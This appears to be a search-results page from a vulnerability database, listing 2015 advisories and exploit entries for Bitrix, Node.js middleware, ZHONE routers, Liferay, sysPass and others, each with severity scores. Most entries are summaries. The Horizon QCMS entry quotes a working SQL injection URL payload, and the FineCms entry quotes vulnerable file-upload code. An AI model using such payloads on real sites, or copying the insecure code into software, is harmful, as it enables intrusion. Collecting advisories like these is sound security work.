
3632 matches found

Packet Storm
added 2015/12/11 12:0 a.m. | 59 views

bitrix.mpbuilder Bitrix 1.0.10 Local File Inclusion

Advisory ID: HTB23281 Product: bitrix.mpbuilder Bitrix module Vendor: www.1c-bitrix.ru Vulnerable Versions: 1.0.10 and probably prior Tested Version: 1.0.10 Advisory Publication: November 18, 2015 without technical details Vendor Notification: November 18, 2015 Vendor Patch: November 25, 2015...

CVSS: 9 | AI score: 0.1 | EPSS: 0.06962
Exploits: 5
Node.js
added 2015/10/17 7:41 p.m. | 30 views

Potential Command Injection

Overview When the ffprobe functionality is enabled on the server, HTTP POST requests can be made to /probe. These requests are passed to the ffprobe binary on the server. Through this HTTP endpoint it is possible to send a malformed source file name to ffprobe that results in arbitrary command...

CVSS: 6.8 | AI score: 2.1 | EPSS: 0.0198
Exploits: 0 | Affected Software: 1
Node.js
added 2015/10/17 7:41 p.m. | 61 views

methodOverride Middleware Reflected Cross-Site Scripting

Overview Connect is a stack of middleware that is executed in order in each request. The "methodOverride" middleware allows the http post to override the method of the request with the value of the "method" post key or with the header "x-http-method-override". Because the user post input was not...

CVSS: 4.3 | AI score: 0.9 | EPSS: 0.01237
Exploits: 0 | Affected Software: 1
0day.today
added 2015/10/16 12:0 a.m. | 36 views

ZHONE < S3.0.501 - Multiple Remote Code Execution Vulnerabilities

Exploit for hardware platform in category dos / poc Vantage Point Security Advisory 2015-003 ======================================== Title: Multiple Remote Code Execution found in ZHONE Vendor: Zhone Vendor URL: http://www.zhone.com Device Model: ZHONE ZNID GPON 2426A 24xx, 24xxA, 42xx, 42xxA,...

AI score: 7
Exploits: 0
seebug.org
added 2015/10/12 12:0 a.m. | 59 views

Horizon QCMS 4.0 'category' Parameter SQL Injection Vulnerability

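Affected systems: Horizon QCMS Horizon QCMS Test method: -------------------------------------------------------------------------------- Warning: the following procedures (methods) may be offensive in nature and are provided for security research and teaching purposes only. Use at your own risk! http://host/download.php?category=%27%20union%20select%201,2,version,4,5,6%20--%202 Recommendation:...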

CVSS: 7.5 | AI score: 6.4 | EPSS: 0.01123
Exploits: 7
exploitpack
added 2015/10/11 12:0 a.m. | 44 views

Liferay 6.1.0 CE - Privilege Escalation

Liferay 6.1.0 CE - Privilege Escalation Exploit Title: Liferay 6.1.0 CE GA1 Privilege Escalation Date: 18/05/2015 Exploit Author: Massimo De Luca - mentat.is Vendor Homepage: https://www.liferay.com Software Link:...

AI score: 0.9
Exploits: 0
Exploit DB
added 2015/10/11 12:0 a.m. | 42 views

Liferay 6.1.0 CE - Privilege Escalation

Exploit Title: Liferay 6.1.0 CE GA1 Privilege Escalation Date: 18/05/2015 Exploit Author: Massimo De Luca - mentat.is Vendor Homepage: https://www.liferay.com Software Link: http://www.liferay.com/it/community/releases/-/assetpublisher/nSr2/content/id/18060360 Version: 6.1.0 CE Tested on: -...

AI score: 7.4
Exploits: 0
OpenVAS
added 2015/10/05 12:0 a.m. | 29 views

X_CART Installation Script Cross Site Scripting Vulnerability

XCART is prone to a cross-site scripting XSS vulnerability. SPDX-FileCopyrightText: 2015 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE = "cpe:/a:qualiteam:x-cart";...

CVSS: 4.3 | AI score: 5.8 | EPSS: 0.01477
Exploits: 1 | References: 2
0day.today
added 2015/09/22 12:0 a.m. | 51 views

nevisAuth Authentication Bypass Vulnerability

nevisAuth versions since 4.13.0.0 2012-11-21 and prior to 4.18.3.1 2015-07-02 suffer from an authentication bypass vulnerability. Product: nevisAuth 1 Vendor: AdNovum 2 CVD ID: CVE-2015-5372 Subject: Authentication Bypass Risk: Critical Effect: Remotely exploitable Authors: Antoine Neuenschwander...

CVSS: 5 | AI score: 6.9 | EPSS: 0.00871
Exploits: 1
NVD
added 2015/09/21 7:59 p.m. | 12 views

CVE-2015-7304

Cross-site scripting XSS vulnerability in the amoCRM module 7.x-1.x before 7.x-1.2 for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified HTTP POST data...

CVSS: 2.6 | AI score: 5.8 | EPSS: 0.00913
Exploits: 0 | References: 2
Prion
added 2015/09/21 7:59 p.m. | 14 views

Cross site scripting

Cross-site scripting XSS vulnerability in the amoCRM module 7.x-1.x before 7.x-1.2 for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified HTTP POST data...

CVSS: 2.6 | AI score: 6.2 | EPSS: 0.00913
Exploits: 0 | References: 2 | Affected Software: 1
Cisco
added 2015/09/18 8:25 p.m. | 38 views

Cisco Unity Connection Web Interface SQL Injection Vulnerability

A vulnerability in the web interface of Cisco Unity Connection UC could allow an authenticated, remote attacker to impact the confidentiality of the system by executing arbitrary SQL queries. The vulnerability is due to a lack of input validation on user-supplied input in SQL queries. An attacker...

CVSS: 6.5 | AI score: 7.4 | EPSS: 0.01592
Exploits: 0 | References: 1
seebug.org
added 2015/09/11 12:0 a.m. | 53 views

FineCms Free Edition Arbitrary File Upload Vulnerability

Path: dayrui/libraries/Chart/ofcuploadimage.php $defaultpath = '../tmp-upload-images/'; if !fileexists$defaultpath mkdir$defaultpath, 0777, true; $destination = $defaultpath . basename $GET 'name' ; echo 'Saving your image to: '. $destination; $jfh = fopen$destination, 'w' or die"can't open file";...

AI score: 7
Exploits: 0
OpenVAS
added 2015/09/08 12:0 a.m. | 52 views

Amazon Linux: Security Advisory (ALAS-2015-536)

The remote host is missing an update for the SPDX-FileCopyrightText: 2015 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

CVSS: 7.8 | AI score: 8 | EPSS: 0.50129
Exploits: 6 | References: 2
securityvulns
added 2015/08/24 12:0 a.m. | 42 views

[SYSS-2015-030] Improper Handling of Insufficient Privileges (CWE-274) in Page2Flip Premium App 2.5

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2015-030 Product: Page2Flip Vendor: w!ssenswerft GmbH Affected Versions: Premium App 2.5, probably also in Business App and Basic App, and in lower versions Tested Versions: Premium App 2.5 Vulnerability Type: Improper Handling of...

AI score: 0.1
Exploits: 0
Cisco
added 2015/08/13 5:38 p.m. | 20 views

Cisco FireSIGHT Management Center System Policy Deletion Vulnerability

A vulnerability in the web interface function to delete a system policy configured in the Cisco FireSIGHT Management Center application could allow unauthenticated, remote attackers to delete a system policy other than their own. The vulnerability is due to improper input validation of certain...

CVSS: 5.8 | AI score: 6.3 | EPSS: 0.02152
Exploits: 0 | References: 1
securityvulns
added 2015/07/14 12:0 a.m. | 211 views

[SYSS-2015-031] sysPass - SQL Injection

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2015-031 Product: sysPass Vendor: http://cygnux.org/ Affected Versions: 1.0.9 and below Tested Versions: 1.0.9 Vulnerability Type: SQL Injection CWE-89 Risk Level: High Solution Status: Fixed Vendor Notification: 2014-07-27 Solutio...

AI score: 8.1
Exploits: 0
exploitpack
added 2015/07/14 12:0 a.m. | 23 views

sysPass 1.0.9 - SQL Injection

sysPass 1.0.9 - SQL Injection -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2015-031 Product: sysPass Vendor: http://cygnux.org/ Affected Versions: 1.0.9 and below Tested Versions: 1.0.9 Vulnerability Type: SQL Injection CWE-89 Risk Level: High Solution Status: Fixed Vendor...

Exploits: 0
0day.today
added 2015/07/14 12:0 a.m. | 39 views

sysPass 1.0.9 - SQL Injection Vulnerability

Exploit for php platform in category web applications Product: sysPass Vendor: http://cygnux.org/ Affected Versions: 1.0.9 and below Tested Versions: 1.0.9 Vulnerability Type: SQL Injection CWE-89 Risk Level: High Solution Status: Fixed Vendor Notification: 2014-07-27 Solution Date: 2014-08-04...

AI score: 7.1
Exploits: 0
Exploit DB
added 2015/07/14 12:0 a.m. | 41 views

sysPass 1.0.9 - SQL Injection

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2015-031 Product: sysPass Vendor: http://cygnux.org/ Affected Versions: 1.0.9 and below Tested Versions: 1.0.9 Vulnerability Type: SQL Injection CWE-89 Risk Level: High Solution Status: Fixed Vendor Notification: 2014-07-27 Solutio...

AI score: 7.4
Exploits: 0